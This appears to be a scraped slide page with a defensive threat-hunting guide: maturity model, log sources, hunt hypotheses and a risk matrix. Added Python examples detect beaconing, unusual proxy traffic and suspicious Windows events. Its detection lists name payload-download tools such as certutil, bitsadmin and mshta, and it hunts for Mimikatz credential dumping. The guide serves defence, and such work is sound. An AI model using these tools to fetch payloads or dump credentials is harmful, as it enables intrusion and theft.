1 | P a g e
Table of Contents
1. Intro to Hunting .......................................... 2
2. Threat Hunting Maturity Model ............................. 2
3. Basic Requirement for Threat Hunting ...................... 3
4. The Pyramid of Pain ....................................... 4
5. Importance of Threat Intelligence in Threat Hunting ....... 4
6. Process to Conduct Threat Hunting ......................... 5
7. Risk Rating Measurement Matrix ............................ 11
Figure 1: A Successful Threat-hunting technique
Threat Hunting Procedures
1. Intro to Hunting – What It Is and Why It’s Important
Hunting is a proactive, hypothesis-based process for investigating cyber-attacks. Threat hunting is the
human-driven, proactive and iterative search through networks, endpoints, or datasets to detect
malicious, suspicious, or risky activities that have evaded the existing automated tools.
Threat hunting has been around for a while, but it has only recently become a focus of modern
enterprise Security Operations Centres (SOCs). Hunting can revolutionize the threat detection efforts
of an organization.
The purpose of hunting is specifically to find what has escaped the automated alerting and
monitoring systems. Hunting means searching for anomalies by patrolling through the data, rather than
investigating an alert raised by the SIEM.
It is also important to keep in mind that successful hunting is tied to capabilities in three different
areas:
2. Threat Hunting Maturity Model
As mentioned, there are many kinds of techniques and practices that an analyst can pursue in hunting.
Hunting maturity is a measure of what kinds of techniques and data an analyst can work with. To help
assess current hunting capabilities and determine how analysts should aim to grow them, the Hunting
Maturity Model (HMM) is given below as a reference.
(The Hunting Maturity Model is a prescriptive model; many organizations will be at varying levels of
capability, excelling at some criteria and less advanced in others.)
Figure 2: Threat-hunting maturity model
The Hunting Maturity Model describes five levels of an organization’s proactive detection capability.
Each level of maturity corresponds to how effectively an organization can hunt based on the data
they collect, their ability to follow and create data analysis procedures (DAP), and their level of
hunting automation. The HMM can be used by analysts and managers to measure current maturity
and provide a roadmap for improvement. Often these improvements focus on a combination of tools,
processes, and personnel.
3. Basic Requirement for Threat Hunting
Analytical Mindset: This is, without question, the most important skill an analyst can possess.
Without the innate curiosity in and pursuit of the “huh … that’s weird,” an analyst can have all the
data in the world, but they will inevitably find themselves missing pieces of the puzzle. The analyst
needs to be able to make reasoned assumptions and chart a new course when the trail runs cold.
Log Analysis: Logs from services and devices are among the most important and underutilized
sources of intelligence for any security department. The ability to analyze logs for anomalies and pivot
between data sources to see the big picture is a key competency.
Network Forensics: The ability to read and understand packet capture data and determine the
malicious nature of network traffic. If you’re fortunate enough to extend your NSM capabilities to the
endpoint with an EDR product, a sound foundation in host-based forensics is key to complement your
network knowledge.
Network Architecture: An understanding of different network devices and how they operate within
the environment.
Attacker Lifecycle: Understanding the different events that happen at any given stage in an attack
lifecycle will better prepare your analysts to compartmentalize and prioritize their findings and
activities.
Figure 3: Pyramid of Pain – Threat-hunting
Tools: This is an incredibly broad area, but at a foundational level, an understanding of how log
aggregators ingest data as well as the function of packet capture analysis tools are essential for the
analyst to understand.
OS Architecture: Different operating systems represent different attack vectors. A strong grasp of
Windows- and Linux-based operating systems is essential.
Attack Methods: Exploit Kits, Malware, Phishing, and software misconfigurations. Understanding
how an attacker attempts to penetrate your network is key to hunting for indicators of the behavior.
4. The Pyramid of Pain
The Pyramid of Pain is a simple diagram that shows the relationship between the types of indicators
an analyst might use to detect an adversary’s activities and how much effort it costs the analyst
to detect those indicators of an incident or attack.
5. Importance of Threat Intelligence in Threat Hunting
Threat Intelligence, or Cyber Threat Intelligence (CTI), is the part of cybersecurity that focuses on the
collection and analysis of information on both potential and current cyber-attacks that threaten the
security of an organization or its assets. Cyber Threat Intelligence is a proactive security measure that
prevents data or security breaches and saves the financial cost of cleaning up after a breach.
CTI’s main objective is to give companies an in-depth understanding of the cyber-threats that
pose the greatest risk to their infrastructure and of how to protect their business in the long run.
Cyber threat intelligence gathers raw information about new and existing threat actors from many
different sources. CTI teams then analyze the collected data to produce threat intelligence feeds and
reports containing only the most important information, which automated security controls and
management can use to make security decisions for the company. The fundamental purpose of this kind
of security is to keep companies informed of advanced threats and exploits.
6. Process to Conduct Threat Hunting
The threat hunting process starts with collecting the logs of all sources, such as security
solutions, databases, servers and applications. The easiest method to collect the logs is to use a
log management device such as a SIEM. After collecting and normalizing the logs, the next step is
to develop a hypothesis and apply it to the data to start hunting.
I. Gathering Data: Collect, Normalize, Analyse
The following are some of the types of logs that may be important to collect in the organization’s
environment:
• Configuration Management Database (CMDB)
• Application/service logs
    o DHCP
    o Proxy
    o Web and Application Server
    o Active Directory/LDAP
    o Domain Name Service (DNS)
    o Application Firewall
    o Database Application and Transaction
• Host-based logs
    o Host/Network IDS/IPS
    o Firewall
    o Antivirus
    o Operating System (e.g., Windows Event and UNIX Syslog)
    o Endpoint Detection and Response (EDR)
    o Virtual Machine Hypervisor
• Network infrastructure logs
    o VPN
    o Router
    o Firewall
    o Load Balancer
The graphic below defines the data collection framework, which is designed to help organizations
focus on discovering and qualifying security incidents and attacks.
Figure 4: Data Collection Framework
II. Development of Hypothesis for Threat-hunting
After collecting, normalizing and analyzing the data, the next step is to develop the hypothesis
and apply it to the data to start hunting. Below is the list of sources that help to develop
advanced threat hunting hypotheses:
Internal Sources: internal sources are data generated within the boundary of an organisation,
such as past incidents, SIEM alerts, VA/PT reports, etc. These data sources are very important and
helpful for a threat hunter building a hypothesis. Hypotheses built on internal data
sources are very effective and realistic. Below are some examples of internal sources:
• Past incidents
• Reconnaissance attempts against your infrastructure
• Threats to specific line of business and industry verticals
• Threats to customers’ intellectual property
• VA/PT reports
External Sources: external sources for hypothesis development are data generated outside the
boundary of an organisation or published by other vendors, such as threat intel feeds, TTPs of an
attack, OSINT, threat advisories, government advisories, etc. Hypotheses built on external sources
are proactive hypotheses that are one step ahead of the monitoring system. Below are some examples
of external sources:
• Paid intelligence feeds
• Open Source Intelligence (OSINT)
• Partnerships with government agencies
• Security Advisories
• TTP of an attack
• Cyber Kill Chain
Figure 5: MITRE ATT&CK Refresher
MITRE ATT&CK Recent Developments: https://attack.mitre.org/resources/updates/
III. List of Threat-hunting Hypotheses
Below is a list of some basic threat hunting hypotheses:
1. Proxy Logs Traffic Analysis Hypothesis
I. Hypothesis: Bytes uploaded stats/Data upload
Hunt For: Session uploaded data > 1 MB
Possible Threat: Data exfiltration
Format: Number of bytes, client IP, server IP, server port
II. Hypothesis: Bytes downloaded stats/file download
Hunt For: Session downloaded data > 3 MB
Possible Threat: Attacker downloading attack tools
Format: Number of bytes, client IP, server IP, server port
III. Hypothesis: HTTP host header/traffic on malicious domain/URL categories
Hunt For: Hosts not ending with .com | .net | .org & host length > 30 char
Possible Threat: DGA, suspicious domains (e.g. http://bit.ly/2jKNAhi, or HTTP traffic to an IP address instead of an FQDN)
Format: Traffic Count, HTTP host, URL Categories
IV. Hypothesis: HTTP referrer header
Hunt For: Malicious referring domains
Possible Threat: Watering hole and JS exploit kits
Format: Count, HTTP referrer, HTTP status code (302)
V. Hypothesis: HTTP user-agent header
Hunt For: Uncommon or non-existing User-Agents
Possible Threat: Malicious traffic
Format: Count, HTTP user-agent, HTTP status code
VI. Hypothesis: HTTP request methods/Suspicious HTTP request
Hunt For: Methods other than GET/POST
Possible Threat: Uploads (PUT method), tunnelling (CONNECT method) and injection
Format: traffic count, HTTP method
VII. Hypothesis: HTTP number of requests/beaconing on suspicious domains
Hunt For: Clients sending increasing number of HTTP requests
Possible Threat: Beacons, tunnelling, and data exfiltration
Format: Count of traffic, client IP, server IP, Domain name, HTTP status code
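As an added example (not part of the original document), the Python below runs proxy-log hypotheses I to VII over a constructed CSV extract: large uploads/downloads, long non-.com/.net/.org hosts or bare IPs, rare User-Agents, non-GET/POST methods and periodic beaconing. The CSV field names, the byte thresholds (1 MB and 3 MB taken as 1,000,000 and 3,000,000 bytes) and the five-request/five-second jitter beaconing rule are assumptions.

```python
import csv
import io
import ipaddress
from collections import defaultdict
from datetime import datetime
from statistics import pstdev

# Constructed proxy log extract (not real traffic). Columns follow the "Format" rows
# of the hypotheses: bytes, client IP, server IP, server port, method, host, user-agent.
SAMPLE_PROXY_LOG = """\
ts,client_ip,server_ip,server_port,method,host,bytes_up,bytes_down,user_agent,status
2024-03-01T09:00:00Z,10.0.0.5,203.0.113.10,443,GET,www.example.com,512,40960,Mozilla/5.0 (Windows NT 10.0),200
2024-03-01T09:00:05Z,10.0.0.6,203.0.113.11,443,POST,cdn.example.net,2400,1024,Mozilla/5.0 (Windows NT 10.0),200
2024-03-01T09:01:00Z,10.0.0.7,198.51.100.20,80,PUT,a9f3kq2lz8vm1xc4b7n0p5r2t6y8u1w3.xyz,2097152,300,python-requests/2.31,201
2024-03-01T09:02:00Z,10.0.0.8,198.51.100.21,80,CONNECT,198.51.100.21,100,100,Mozilla/5.0 (Windows NT 10.0),200
2024-03-01T09:00:00Z,10.0.0.9,198.51.100.22,443,GET,update.example.org,200,200,Mozilla/5.0 (Windows NT 10.0),200
2024-03-01T09:01:00Z,10.0.0.9,198.51.100.22,443,GET,update.example.org,200,200,Mozilla/5.0 (Windows NT 10.0),200
2024-03-01T09:02:00Z,10.0.0.9,198.51.100.22,443,GET,update.example.org,200,200,Mozilla/5.0 (Windows NT 10.0),200
2024-03-01T09:03:00Z,10.0.0.9,198.51.100.22,443,GET,update.example.org,200,200,Mozilla/5.0 (Windows NT 10.0),200
2024-03-01T09:04:00Z,10.0.0.9,198.51.100.22,443,GET,update.example.org,200,200,Mozilla/5.0 (Windows NT 10.0),200
"""

UPLOAD_THRESHOLD = 1_000_000     # Hypothesis I: session uploaded data > 1 MB (assumed decimal MB)
DOWNLOAD_THRESHOLD = 3_000_000   # Hypothesis II: session downloaded data > 3 MB
COMMON_TLDS = (".com", ".net", ".org")
EXPECTED_METHODS = {"GET", "POST"}


def parse_log(text):
    """Parse the CSV extract; byte counters become ints and timestamps become datetimes."""
    rows = list(csv.DictReader(io.StringIO(text)))
    for r in rows:
        r["bytes_up"], r["bytes_down"] = int(r["bytes_up"]), int(r["bytes_down"])
        r["ts"] = datetime.fromisoformat(r["ts"].replace("Z", "+00:00"))
    return rows


def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def hunt_large_transfers(rows):
    """Hypotheses I and II: sessions above the upload or download threshold."""
    return [(r["client_ip"], r["server_ip"], r["server_port"], r["bytes_up"], r["bytes_down"])
            for r in rows
            if r["bytes_up"] > UPLOAD_THRESHOLD or r["bytes_down"] > DOWNLOAD_THRESHOLD]


def hunt_suspicious_hosts(rows):
    """Hypothesis III: hosts > 30 chars outside .com/.net/.org, or an IP used instead of a FQDN."""
    hits = set()
    for r in rows:
        host = r["host"].lower()
        if is_ip_literal(host) or (not host.endswith(COMMON_TLDS) and len(host) > 30):
            hits.add(host)
    return sorted(hits)


def hunt_rare_user_agents(rows, max_clients=1):
    """Hypothesis V: User-Agents seen from at most `max_clients` distinct clients."""
    clients = defaultdict(set)
    for r in rows:
        clients[r["user_agent"]].add(r["client_ip"])
    return sorted(ua for ua, c in clients.items() if len(c) <= max_clients)


def hunt_unusual_methods(rows):
    """Hypothesis VI: methods other than GET/POST (PUT uploads, CONNECT tunnels), per client."""
    counts = defaultdict(int)
    for r in rows:
        if r["method"] not in EXPECTED_METHODS:
            counts[(r["client_ip"], r["method"])] += 1
    return dict(counts)


def hunt_beacons(rows, min_requests=5, max_jitter_s=5.0):
    """Hypothesis VII: one client hitting one host repeatedly at near-constant intervals."""
    by_pair = defaultdict(list)
    for r in rows:
        by_pair[(r["client_ip"], r["host"])].append(r["ts"])
    beacons = []
    for pair, stamps in by_pair.items():
        if len(stamps) < min_requests:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        if pstdev(gaps) <= max_jitter_s:  # low jitter = machine-like periodicity
            beacons.append((*pair, len(stamps), round(sum(gaps) / len(gaps), 1)))
    return beacons


if __name__ == "__main__":
    rows = parse_log(SAMPLE_PROXY_LOG)
    for hunt in (hunt_large_transfers, hunt_suspicious_hosts, hunt_rare_user_agents,
                 hunt_unusual_methods, hunt_beacons):
        print(hunt.__name__, "->", hunt(rows))
```

Fixed byte thresholds and a one-client User-Agent rule generate noise on large estates; tune them against a baseline week of your own proxy data before treating hits as leads.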
2. Firewall Traffic Analysis Hypothesis
I. Hypothesis: SSH sessions
Hunt For: Unexpected connections
Possible Threat: Recon and lateral movements
Format: Count of traffic, client IP, server IP, server port
II. Hypothesis: RDP sessions/Unauthorized Remote desktop connection
Hunt For: Unexpected RDP clients/servers
Possible Threat: Lateral movements
Format: Count of traffic, client IP, server IP, server port
III. Hypothesis: IRC sessions/Suspicious malware communication
Hunt For: IRC clients
Possible Threat: C&C traffic and potential insider
Format: Count of traffic, client IP, server IP, server port
IV. Hypothesis: FTP sessions/Data exfiltration
Hunt For: Unexpected FTP clients/server
Possible Threat: Lateral movements or data exfiltration
Format: Count of traffic, Client IP, Server IP, Server port
V. Hypothesis: TCP listening ports on private IPs/Inbound Traffic on critical ports
Hunt For: Unauthorized service
Possible Threat: Backdoors
Format: Count of sessions, TCP port, server IP, protocol
VI. Hypothesis: TCP listening ports on public IPs/outbound connection on suspicious IP
Hunt For: Abnormal port/protocol combination (i.e. non-HTTP carried over port 80)
Possible Threat: Unauthorized communication channel
Format: Count of sessions, TCP port, protocol
3. Antivirus Traffic Analysis Hypothesis
I. Hypothesis: Continuous malware infection on a system
Hunt For: Recurring malware/reinfection
Possible Threat:
Format: Virus name, infected file, File Hash value, count of infection
II. Hypothesis: Uncleaned malware infection
Hunt For: Uncleaned malware
Possible Threat: New Malware/ransomware without signature
Format: Action Taken, Virus name, infected file, File Hash value, count of infection
4. Windows logs Analysis Hypothesis
I. Hypothesis: Detailed Tracking events/Process Creation
Hunt For: Suspicious process created by an attacker or malware
Possible Threat: APT threat, new malware
Format: Event ID 4688, 4689, New Process Name, Creator Process Name, Logon ID, Account Name
II. Hypothesis: User added to privilege group
Hunt For: APT expansion/Privilege escalation
Possible Threat: APT Attack
Format: Event ID 4732, 4728, 4756, 4746, 4751, 4761, Account Name, Logon ID
III. Hypothesis: Detection of Mimikatz
Hunt For: Credential dumps
Possible Threat: APT Attack
Format: Event ID 4688, 4689, event data image: lsass.exe, Mimikatz.exe
5. Other Hunting Hypothesis
• Hunt for File-less Malware
• Hunt for Malware
• Hunt for Lateral Movements
• Hunt for Windows Event IDs
• Hunt for group policy violations
• Hunt for Network Beaconing
• Hunt for Insider Privilege Escalation
• Hunt for Privilege failures
• Hunt for PowerShell Errors
• Hunt for PowerShell Traces
• Hunt for Login Failures on Critical Servers
• Hunt for vulnerabilities
• Hunt for Persistence Threats
• Hunt for Registry violations
• Hunt for Network traffic denied by firewalls or IPs
• Hunt for Unusual DNS requests - either to malicious domains or internal flaws
• Hunt for Signs of DDoS activity and geographic irregularities
• Hunt for Mismatched port-application traffic
• Hunt for Unusual north-south or east-west network traffic
• Hunt for Anomalies
• Hunt for Unknown Network Shares
• Hunt for Network Recon tools
• Hunt for brute force RDP attempts
• Hunt for Suspicious File Types
• Hunt for Windows Admin Shares
• Hunt for RDP, PsExec, Task created, Task scheduled, WMI, Services created
• Hunt for Parent/Child relationships - Process
• Hunt for Parent/Child relationships - MS Office
• Hunt for Parent/Child relationships - Cmd
• Hunt for Parent/Child relationships - PowerShell
• Hunt for Parent/Child relationships - Memory
• Hunt for Process Injection
• Hunt for Windows one-liners used to download remote payloads. Possible tools: powershell.exe,
wmic.exe, regsvr32.exe, rundll32.exe, mshta.exe, regasm.exe, regsvcs.exe, odbcconf.exe, msbuild.exe,
certutil.exe, bitsadmin.exe
• Hunt for Masquerading
• Hunt for Privilege Escalation - Access token manipulation
• Hunt for Privilege Escalation - Weak service permissions
• Hunt for UAC Bypass
• Hunt for Credential Dumping
• Hunt for Credentials Dumping - Dump SAM/SECURITY registry hives
• Hunt for Credentials Dumping - Shadow Copies
• Hunt for Mimikatz cmds / Hunting DCShadow
• Hunt for Credentials Dumping - LSASS memory access
• Hunt for Suspicious Services - services that run executables from %systemroot%
• Hunt for Suspicious Services - services that run PowerShell
• Hunt for Beaconing
• Hunt for BOT Activity
• Hunt for Malicious Domains & DNS Tunneling
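As an added example (not the author's code), the Python below applies the Windows-log hypotheses of section 4 and the parent/child and one-liner items of section 5 to constructed Security events: Office or shell processes spawning the listed tools (4688), additions to privileged groups (4728/4732/4756) and the page's Mimikatz file-name check. The event dicts, the privileged-group names and the Office/shell process sets are assumptions; the group name living in TargetUserName and the member in MemberName follows the documented 4728/4732/4756 event layout.

```python
import ntpath  # resolves Windows-style paths (backslashes) even when run on Linux

# Constructed Windows Security events modelled on 4688/4689/4728/4732 EventData fields;
# not captured from a real host.
SAMPLE_EVENTS = [
    {"EventID": 4688, "Computer": "WS01", "SubjectUserName": "alice",
     "CreatorProcessName": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"EventID": 4688, "Computer": "WS01", "SubjectUserName": "alice",
     "CreatorProcessName": r"C:\Windows\explorer.exe",
     "NewProcessName": r"C:\Program Files\Google\Chrome\Application\chrome.exe"},
    {"EventID": 4688, "Computer": "WS02", "SubjectUserName": "bob",
     "CreatorProcessName": r"C:\Windows\System32\cmd.exe",
     "NewProcessName": r"C:\Users\bob\AppData\Local\Temp\mimikatz.exe"},
    {"EventID": 4688, "Computer": "WS02", "SubjectUserName": "bob",
     "CreatorProcessName": r"C:\Windows\System32\cmd.exe",
     "NewProcessName": r"C:\Windows\System32\mshta.exe"},
    {"EventID": 4689, "Computer": "WS02", "SubjectUserName": "bob",
     "ProcessName": r"C:\Windows\System32\mshta.exe"},          # process exit: ignored by the hunts
    {"EventID": 4732, "Computer": "DC01", "SubjectUserName": "svc_helpdesk",
     "TargetUserName": "Administrators", "MemberName": r"CONTOSO\bob"},
    {"EventID": 4728, "Computer": "DC01", "SubjectUserName": "hr_admin",
     "TargetUserName": "Marketing", "MemberName": r"CONTOSO\carol"},
]

# Tools from the "Windows one-liners" hypothesis, plus the hosts that typically launch them.
LOLBINS = {"powershell.exe", "wmic.exe", "regsvr32.exe", "rundll32.exe", "mshta.exe",
           "regasm.exe", "regsvcs.exe", "odbcconf.exe", "msbuild.exe", "certutil.exe",
           "bitsadmin.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}   # assumed set
SHELLS = {"cmd.exe", "powershell.exe"}
PRIVILEGED_GROUPS = {"administrators", "domain admins", "enterprise admins", "schema admins"}
GROUP_ADD_EVENTS = {4728, 4732, 4756}   # member added to global / local / universal group
CREDENTIAL_DUMPERS = {"mimikatz.exe"}   # the page's own example; extend from your CTI


def basename(path):
    return ntpath.basename(path).lower()


def hunt_parent_child(events):
    """4688: Office spawning a shell or listed tool, or a shell spawning a listed tool."""
    hits = []
    for e in events:
        if e["EventID"] != 4688:
            continue
        parent, child = basename(e["CreatorProcessName"]), basename(e["NewProcessName"])
        office_chain = parent in OFFICE_APPS and child in (LOLBINS | SHELLS)
        shell_chain = parent in SHELLS and child in LOLBINS
        if office_chain or shell_chain:
            hits.append((e["Computer"], e["SubjectUserName"], parent, child))
    return hits


def hunt_privileged_group_additions(events):
    """4728/4732/4756 where the target group is a privileged one."""
    return [(e["Computer"], e["SubjectUserName"], e["MemberName"], e["TargetUserName"])
            for e in events
            if e["EventID"] in GROUP_ADD_EVENTS
            and e["TargetUserName"].lower() in PRIVILEGED_GROUPS]


def hunt_credential_dumping(events):
    """4688 where the new process image is a known credential-dumping tool name."""
    return [(e["Computer"], e["SubjectUserName"], e["NewProcessName"])
            for e in events
            if e["EventID"] == 4688 and basename(e["NewProcessName"]) in CREDENTIAL_DUMPERS]


if __name__ == "__main__":
    for hunt in (hunt_parent_child, hunt_privileged_group_additions, hunt_credential_dumping):
        print(f"== {hunt.__name__} ==")
        for hit in hunt(SAMPLE_EVENTS):
            print("  ", hit)
```

Matching on a file name such as mimikatz.exe sits at the bottom of the Pyramid of Pain and is defeated by a rename; pair it with process-access telemetry on lsass.exe (for example Sysmon Event ID 10) for a durable credential-dumping hunt.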
7. Risk Rating Measurement Matrix
This rating is reserved for threats that will result in an impact to the organization.
HIGH
A threat is categorized as HIGH if it:
• involves critical organization assets
• attempts to evade standard signature-based detections
• exfiltrates data outside the organization
• attempts to create a communication link with an external Command & Control server
• results in direct reputational or financial loss for the organization
MEDIUM
A threat is categorized as MEDIUM if it:
• involves limited infections at endpoints
• involves malware on a system that cannot be cleaned/deleted/quarantined
• attempts to connect externally but is blocked
• involves access to suspicious domains or IP addresses
LOW
A threat is categorized as LOW if it:
• involves attempted attacks from external sources
• relates to security misconfiguration in systems
• involves access to non-standard or non-business domains or IP addresses
• involves installation of unnecessary applications (not necessarily malicious)
Prepared By:
Vishal Kumar
Threat Analyst

Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 

Threat Hunting Procedures and Measurement Matrix

2. Threat Hunting Maturity Model

As mentioned, there are many kinds of techniques and practices an analyst can pursue in hunting. Hunting maturity is a measure of which techniques and which data an analyst is able to work with. To help assess current hunting capability and decide how analysts should aim to grow it, the Hunting Maturity Model (HMM) is given below as a reference. (The HMM is a prescriptive model; many organizations will be at varying levels of capability, excelling at some criteria and less advanced in others.)
Figure 2: Threat-hunting maturity model

The Hunting Maturity Model describes five levels of an organization's proactive detection capability. Each level corresponds to how effectively the organization can hunt, based on the data it collects, its ability to follow and create data analysis procedures (DAP), and its level of hunting automation. Analysts and managers can use the HMM to measure current maturity and as a roadmap for improvement; the improvements usually combine tools, processes and personnel.

3. Basic Requirements for Threat Hunting

• Analytical mindset: without question the most important skill an analyst can possess. Without innate curiosity and the pursuit of the "huh ... that's weird" moment, an analyst can have all the data in the world and will still find pieces of the puzzle missing. The analyst needs to be able to make reasoned assumptions and chart a new course when the trail runs cold.
• Log analysis: logs from services and devices are among the most important and most underutilized sources of intelligence for any security department. The ability to analyze logs for anomalies and pivot between data sources to see the big picture is a key competency.
• Network forensics: the ability to read and understand packet capture data and determine whether network traffic is malicious. If you are fortunate enough to extend your NSM capabilities to the endpoint with an EDR product, a sound foundation in host-based forensics is key to complement the network knowledge.
• Network architecture: an understanding of the different network devices and how they operate within the environment.
• Attacker lifecycle: understanding the events that happen at each stage of an attack lifecycle prepares analysts to compartmentalize and prioritize their findings and activities.
Figure 3: Pyramid of Pain – Threat-hunting

• Tools: an incredibly broad area, but at a foundational level an understanding of how log aggregators ingest data and of what packet capture analysis tools do is essential for the analyst.
• OS architecture: different operating systems present different attack vectors. A strong grasp of Windows- and Linux-based operating systems is essential.
• Attack methods: exploit kits, malware, phishing and software misconfigurations. Understanding how an attacker attempts to penetrate the network is key to hunting for indicators of that behaviour.

4. The Pyramid of Pain

The Pyramid of Pain is a simple diagram that relates the types of indicator an analyst might use to detect an adversary's activity to how much pain it causes the adversary when the analyst detects and acts on that indicator type. Indicators at the base (hash values, IP addresses) are trivial for an attacker to change, while those at the top (tools, and tactics, techniques and procedures) force the adversary to rework how they operate, so hunts built on behaviour are harder to evade than hunts built on atomic indicators.

5. Importance of Threat Intelligence in Threat Hunting

Threat Intelligence, or Cyber Threat Intelligence (CTI), is the part of cybersecurity that focuses on collecting and analysing information about potential and current cyber-attacks that threaten the security of an organization or its assets. CTI is a proactive security measure: it helps prevent data and security breaches and saves the cost of cleaning up after a breach.
CTI's main objective is to give companies an in-depth understanding of the cyber-threats that pose the greatest risk to their infrastructure and of how to protect their business in the long run. Cyber threat intelligence gathers raw information about new and existing threat actors from many different sources. CTI teams then analyse the collected data to produce threat intelligence management feeds and reports containing only the most important information, which automated security controls and management can use to make security decisions for the company. The fundamental purpose of this kind of security is to keep companies informed of advanced threats and exploits.

6. Process to Conduct Threat Hunting

The threat hunting process starts with collecting logs from all sources, such as security solutions, databases, servers and applications. The easiest method of collecting them is a log management platform such as a SIEM. After the logs are collected and normalized, the next step is to develop a hypothesis and apply it to the resulting data to start the hunt.

I. Gathering Data: Collect, Normalize, Analyse

The following are some of the types of logs that may be important to collect in the organization's environment:

• Configuration Management Database (CMDB)
• Application/service logs: DHCP, proxy, web and application server, Active Directory/LDAP, Domain Name Service (DNS), application firewall, database application and transaction logs
• Host-based logs: host/network IDS/IPS, host firewall, antivirus, operating system (e.g. Windows Event and UNIX syslog), Endpoint Detection and Response (EDR), virtual machine hypervisor
• Network infrastructure logs: VPN, router, firewall, load balancer

The graphic below defines a data collection framework designed to help organizations focus on discovering and qualifying security incidents and attacks.
Figure 4: Data Collection Framework

II. Development of a Hypothesis for Threat-hunting

After collecting, normalizing and analysing the data, the next step is to develop a hypothesis and apply it to the output to start hunting. Two kinds of sources help in developing advanced threat hunting hypotheses:

Internal sources: data generated inside the boundary of the organization, such as past incidents, SIEM alerts and VA/PT reports. These sources are very important and helpful for a threat hunter building a hypothesis, and hypotheses built on internal data are the most effective and realistic. Some examples of internal sources:

• Past incidents
• Reconnaissance attempts against your infrastructure
• Threats to specific lines of business and industry verticals
• Threats to customers' intellectual property
• VA/PT reports

External sources: data generated outside the boundary of the organization or published by other vendors, such as threat intel feeds, the TTPs of an attack, OSINT, threat advisories and government advisories. Hypotheses built on external sources are proactive: they run one step ahead of the monitoring system. Some examples of external sources:
Figure 5: MITRE ATT&CK refresher

MITRE ATT&CK recent developments: https://attack.mitre.org/resources/updates/

• Paid intelligence feeds
• Open Source Intelligence (OSINT)
• Partnerships with government agencies
• Security advisories
• TTPs of an attack
• Cyber Kill Chain

III. List of Threat-hunting Hypotheses

Below is a list of some basic threat hunting hypotheses:

1. Proxy Log Traffic Analysis Hypotheses

I. Hypothesis: bytes uploaded stats / data upload
Hunt for: session uploaded data > 1 MB
Possible threat: data exfiltration
Format: number of bytes, client IP, server IP, server port

II. Hypothesis: bytes downloaded stats / file download
Hunt for: session downloaded data > 3 MB
Possible threat: attacker downloading attack tools
Format: number of bytes, client IP, server IP, server port

III. Hypothesis: HTTP Host header / traffic to malicious domains or URL categories
Hunt for: hosts not ending in .com, .net or .org with a host length > 30 characters
Possible threat: DGA domains, suspicious domains (e.g. http://bit.ly/2jKNAhi, or HTTP traffic to an IP address instead of an FQDN)
Format: traffic count, HTTP host, URL category
IV. Hypothesis: HTTP Referer header
Hunt for: malicious referring domains
Possible threat: watering hole attacks and JavaScript exploit kits
Format: count, HTTP referer, HTTP status code (302)

V. Hypothesis: HTTP User-Agent header
Hunt for: uncommon or non-existent User-Agent strings
Possible threat: malicious traffic
Format: count, HTTP user-agent, HTTP status code

VI. Hypothesis: HTTP request methods / suspicious HTTP requests
Hunt for: methods other than GET/POST
Possible threat: uploads (PUT method), tunnelling (CONNECT method) and injection
Format: traffic count, HTTP method

VII. Hypothesis: HTTP number of requests / beaconing to suspicious domains
Hunt for: clients sending an increasing number of HTTP requests, particularly at regular intervals to the same domain
Possible threat: beacons, tunnelling and data exfiltration
Format: traffic count, client IP, server IP, domain name, HTTP status code

2. Firewall Traffic Analysis Hypotheses

I. Hypothesis: SSH sessions
Hunt for: unexpected connections
Possible threat: reconnaissance and lateral movement
Format: traffic count, client IP, server IP, server port

II. Hypothesis: RDP sessions / unauthorized remote desktop connections
Hunt for: unexpected RDP clients/servers
Possible threat: lateral movement
Format: traffic count, client IP, server IP, server port

III. Hypothesis: IRC sessions / suspicious malware communication
Hunt for: IRC clients
Possible threat: C&C traffic and a potential insider
Format: traffic count, client IP, server IP, server port

IV. Hypothesis: FTP sessions / data exfiltration
Hunt for: unexpected FTP clients/servers
Possible threat: lateral movement or data exfiltration
Format: traffic count, client IP, server IP, server port

V. Hypothesis: TCP listening ports on private IPs / inbound traffic on critical ports
Hunt for: unauthorized services
Possible threat: backdoors
Format: session count, TCP port, server IP, protocol

VI. Hypothesis: TCP listening ports on public IPs / outbound connections to suspicious IPs
Hunt for: abnormal port/protocol combinations (e.g. non-HTTP traffic carried over port 80)
Possible threat: unauthorized communication channel
Format: session count, TCP port, protocol

3. Antivirus Log Analysis Hypotheses

I. Hypothesis: recurring malware infection on a system
Hunt for: recurring infection / malware reinfection
Possible threat:
Format: virus name, infected file, file hash value, infection count

II. Hypothesis: uncleaned malware infection
Hunt for: uncleaned malware
Possible threat: new malware/ransomware without a signature
Format: action taken, virus name, infected file, file hash value, infection count

4. Windows Log Analysis Hypotheses

I. Hypothesis: Detailed Tracking events / process creation
Hunt for: suspicious processes created by an attacker or malware
Possible threat: APT, new malware
Format: event IDs 4688 (process creation) and 4689 (process exit), new process name, creator process name, logon ID, account name

II. Hypothesis: user added to a privileged group
Hunt for: APT expansion / privilege escalation
Possible threat: APT attack
Format: event IDs 4732, 4728, 4756, 4746, 4751, 4761 (member added to a local, global or universal group), account name, logon ID

III. Hypothesis: detection of Mimikatz
Hunt for: credential dumps
Possible threat: APT attack
Format: event IDs 4688, 4689, with event data image lsass.exe or mimikatz.exe. Matching on the image name only catches an unrenamed binary, so the command line and accesses to lsass.exe need to be checked as well.
